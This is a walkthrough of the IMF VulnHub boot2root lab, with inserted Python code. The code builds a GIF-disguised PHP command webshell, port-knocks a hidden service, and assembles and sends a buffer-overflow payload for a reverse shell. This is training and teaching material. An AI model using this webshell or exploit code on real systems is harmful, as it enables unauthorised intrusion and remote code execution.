IMF: 1

[ vulnhub boot2root walkthrough ]

Goal

6 flags in flag{base64hash} format
root

Download

https://www.vulnhub.com/entry/imf-1,162/

Walkthrough

nmap scan of the target

default page on port 80

flag 1 found in the page source

flag 1 decoded gives a hint to look at all the files

looking further at the source, the js file names look like base64

putting them together in page order and decoding gives flag 2; the next hint looks like a directory name
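The join-and-decode step above, as an added example (not code from the walkthrough): the script names and the flag below are constructed for the demo, since the real names are only in the lost screenshots. The point it shows is that the fragments must be concatenated in document order before decoding, and that base64 padding is only valid once at the end of the joined string.

```python
import base64
import re

# Constructed sample: a flag base64-encoded and split across three fake
# script names. The real file names and flag are not on the page.
SAMPLE_FLAG = b"flag{constructed_example_flag}"
_enc = base64.b64encode(SAMPLE_FLAG).decode()
_n = -(-len(_enc) // 3)  # ceil division: three roughly equal chunks
SAMPLE_HTML = "\n".join(
    f'<script src="js/{_enc[i:i + _n]}.min.js"></script>'
    for i in range(0, len(_enc), _n)
)

# Script basenames made only of base64 alphabet characters.
B64_NAME = re.compile(r'src="js/([A-Za-z0-9+/=]+)\.min\.js"')


def extract_b64_fragments(html):
    """Return the base64-looking script basenames in document order."""
    return B64_NAME.findall(html)


def decode_joined(fragments):
    """Join fragments, restore any missing '=' padding, then decode strictly."""
    joined = "".join(fragments)
    joined += "=" * (-len(joined) % 4)
    return base64.b64decode(joined, validate=True)


def recover_flag(html):
    """Full pipeline: scrape the names, join them, decode."""
    return decode_joined(extract_b64_fragments(html))


if __name__ == "__main__":
    print(recover_flag(SAMPLE_HTML).decode())
```

Decoding each fragment on its own fails or yields garbage because a chunk boundary rarely falls on a 4-character base64 group, which is why the page's "putting together" step comes before decoding.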

the hint from flag 2 gives a login page

the source hints at sqli… yeah, i wasn't able to get it

after failing at sqli, went to gobuster and dirb

an image found contains a qr code

flag 4 found; it gives the name of the php upload script

using the found uploader, a test upload of a jpg is successful

we know of the uploads/image directories from gobuster, but the file isn't there
looking at the source after the upload there is a hash commented out

the hash plus the file extension finds our uploaded image

trying to upload a php file fails

adding .jpg to the .php file name fails due to signature checks

there are also file size restrictions, but gifs work

after much searching it took a combination of things to get past the upload restrictions
the signature check is satisfied by starting the file with GIF89a; as found in this post
after hitting so many php one-liner restrictions, the backtick form shown here worked

uploading and calling the above gif/code gives code execution
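An added example, not the walkthrough's payload, of why the GIF89a trick works: a header-only signature check is compared with one that also scans the body for PHP open tags. The exact backtick one-liner on the page is lost with its screenshot, so the `PHP_BACKTICK_SHELL` string here is an assumption, as is the `naive_upload_check` that stands in for what the box did (magic bytes plus a size cap).

```python
import re

# Assumed PHP one-liner (the page only says "backticks worked"). Backticks
# run the command through the shell and echo the output back to the caller.
PHP_BACKTICK_SHELL = b"<?php echo `$_REQUEST['c']`; ?>"

# Magic bytes a header-only check looks at. "GIF89a;" is the trick from the
# walkthrough: the prefix satisfies the signature, and outside <?php ... ?>
# the PHP interpreter just emits the leading bytes as text.
MAGIC = {
    b"GIF89a": "gif",
    b"GIF87a": "gif",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
}


def build_gif_polyglot(php=PHP_BACKTICK_SHELL):
    """Valid-looking GIF header followed by PHP: a polyglot upload."""
    return b"GIF89a;\n" + php + b"\n"


def sniff_type(data):
    """Type by magic bytes only, the way a naive uploader decides."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def naive_upload_check(data, max_size=4096):
    """Assumed stand-in for the box: allow-listed magic bytes plus a size cap."""
    return sniff_type(data) is not None and len(data) <= max_size


# Matches <?php, <?=, and the short open tag followed by whitespace.
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)


def hardened_upload_check(data, max_size=4096):
    """Same checks plus a body scan for PHP open tags. This is a mitigation
    only; the real fix is to never execute anything from the upload
    directory (no script handler there, or store outside the web root)."""
    return naive_upload_check(data, max_size) and PHP_TAG.search(data) is None


if __name__ == "__main__":
    poly = build_gif_polyglot()
    print("naive accepts polyglot:", naive_upload_check(poly))
    print("hardened accepts polyglot:", hardened_upload_check(poly))
```

The body scan catches this particular polyglot but not every encoding trick; the durable control is that the web server must not treat files under the upload path as executable at all.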

modifying the code, uploading and calling it again gives flag 5

the next hint seems to point at something running on the system, so we need a shell

since flag 3 was missed, we modify our code to list files and cat out index.php
whatever lolz

now for a reverse shell. we know there are a bunch of restrictions around php one-liners,
so maybe python? the initial call didn't work, so we look at a full file listing,
specifically under /usr/bin, and find python3

this is our code to get a shell

finally, but we’re just getting started

from the hint we look at /etc/services and find it's running on 7788/tcp

also did a find for agent

running agent looks to be what we're looking for

the directory contains two files

we know the binary asks for an ID, and using strings we see a string compare

forgot we were on a remote system and started examining the file there… ltrace was installed and the code was found :)

the code works, and i'm assuming a buffer overflow

after some time we find that option 3, submit report, is vulnerable

so now what? remembered that this isn't only a binary, it's also running on port 7788
only port 80 is open though

insert lots of wasted time x1000

finally noticed that knockd is running and remembered the access_codes file

i know of port knocking, but i'm not very familiar with it… off to google

found a good digital ocean post on what i needed to do

followed the instructions and modified them a bit

and it worked
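The knock itself, as an added example rather than the walkthrough's modified script: one TCP connect attempt per port, in order, then a probe of the service port. knockd only needs to see the SYNs, so refused or timed-out connects still count. The port sequence and host are placeholders; the real sequence came from the access_codes file on the box and is not reproduced here.

```python
import socket
import sys
import time

# Placeholder sequence: replace with the ports recovered from access_codes.
KNOCK_SEQUENCE = [7482, 8279, 9663]
TARGET_PORT = 7788


def tcp_probe(host, port, timeout=0.5):
    """One connect attempt. Returns True only if something accepted it;
    for knocking the result is informational, the SYN is what matters."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return True
    except OSError:
        return False
    finally:
        s.close()


def knock(host, sequence, delay=0.3, probe=tcp_probe):
    """Hit each port in order with a short pause so knockd sees them as a
    sequence. `probe` is injectable so the ordering can be tested offline."""
    hit = []
    for port in sequence:
        probe(host, port)
        hit.append(port)
        time.sleep(delay)
    return hit


def knock_and_check(host, sequence, target_port, probe=tcp_probe, delay=0.3):
    """Knock, then report whether the guarded port now accepts a connection."""
    knock(host, sequence, delay, probe)
    return probe(host, target_port)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.0.0.5"  # placeholder host
    print(f"{TARGET_PORT} open after knock:",
          knock_and_check(target, KNOCK_SEQUENCE, TARGET_PORT))
```

If the check still fails, the usual culprits are the order (knockd sequences are ordered), the inter-knock timing being longer than knockd's `seq_timeout`, or a stale partial sequence from an earlier attempt.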

so now we have to work on the exploit on our local machine:
a simple copy of the binary over to the web directory and a wget

now onto the binary

start by creating a pattern of 200

examined in gdb

find the offset: 168

then test the offset in gdb and it's correct
we also find that eax holds a pointer into our overflowed buffer, so we look for a jmp, or rather a call, to that register

started playing around with pwntools lately and created a skeleton exploit script,
referencing the documentation and this post heavily

test out the skeleton code; it seems to work

we know we need a reverse shell, so we create one with msfvenom
after some back and forth i find that \x0a is also a bad char

update the payload in our script

do an initial test and it works, so we remove the interactive part of our script

we then set up a local listener and test again… BOOM

with that working, we run the script against the remote system and we have a reverse shell as root
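The exploit steps above (pattern, offset, bad chars, payload layout, delivery) as one added example; this is not the walkthrough's pwntools script and uses only the standard library. It reproduces what msf pattern_create/pattern_offset do, rejects shellcode or gadget bytes containing the bad chars found above (\x00 and \x0a), and lays the buffer out on the assumption that eax points at the start of our input when the `call eax` lands, so shellcode goes first and the overwritten return address comes at offset 168. The agent ID, gadget address, target host, menu prompts and the NOP placeholder standing in for msfvenom's output are all assumptions, not values from the page.

```python
import socket
import struct
from itertools import product

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Same layout as msf pattern_create (Aa0Aa1...Aa9Ab0...): every 4-byte
    window is unique, so a crash value maps back to one offset."""
    full = "".join(u + l + d for u, l, d in product(UPPER, LOWER, DIGITS))
    if length > len(full):
        raise ValueError("pattern too long for the msf alphabet")
    return full[:length].encode()


def pattern_offset(eip, length=200):
    """Map the EIP value gdb shows at the crash back to a buffer offset.
    gdb prints the dword, so pack it little-endian to get the bytes."""
    needle = struct.pack("<I", eip)
    off = pattern_create(length).find(needle)
    if off < 0:
        raise ValueError("value not found in pattern")
    return off


def find_bad_chars(data, badchars):
    """Which of the known bad bytes appear in data (sorted, deduplicated)."""
    return sorted({b for b in data if b in badchars})


def build_payload(offset, call_reg_addr, shellcode, badchars=frozenset({0x00, 0x0a})):
    """shellcode | padding to `offset` | address of a `call eax` gadget.
    Assumes eax points at the start of our input (see lead-in)."""
    addr = struct.pack("<I", call_reg_addr)
    for name, blob in (("shellcode", shellcode), ("gadget address", addr)):
        hit = find_bad_chars(blob, badchars)
        if hit:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in hit]}")
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    return shellcode + b"A" * (offset - len(shellcode)) + addr


def exploit_messages(agent_id, payload):
    """Inputs in the order the service expects: agent ID, menu option 3
    (submit report), then the report body that overflows."""
    return [agent_id.encode() + b"\n", b"3\n", payload + b"\n"]


def send_exploit(host, port, agent_id, payload, timeout=5.0):
    """Deliver over TCP. Prompt text is not on the page, so each step just
    drains whatever the service printed before sending the next line."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for msg in exploit_messages(agent_id, payload):
            try:
                s.recv(4096)
            except socket.timeout:
                pass
            s.sendall(msg)


if __name__ == "__main__":
    # Placeholders: swap in msfvenom output (generated with -b '\x00\x0a'),
    # the real `call eax` address, the agent ID and the box's IP.
    SHELLCODE = b"\x90" * 32
    CALL_EAX = 0x08048563
    send_exploit("10.0.0.5", 7788, "00000000",
                 build_payload(168, CALL_EAX, SHELLCODE))
```

Run with a listener up first (`nc -lvnp <port>` matching the msfvenom LHOST/LPORT). The bad-char check is what the "after some back and forth" step above was doing by hand: \x0a is fatal here because the service reads its input line by line, so a newline inside the shellcode truncates the report.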

flag 6 found and decoded

the end

Written on December 1, 2018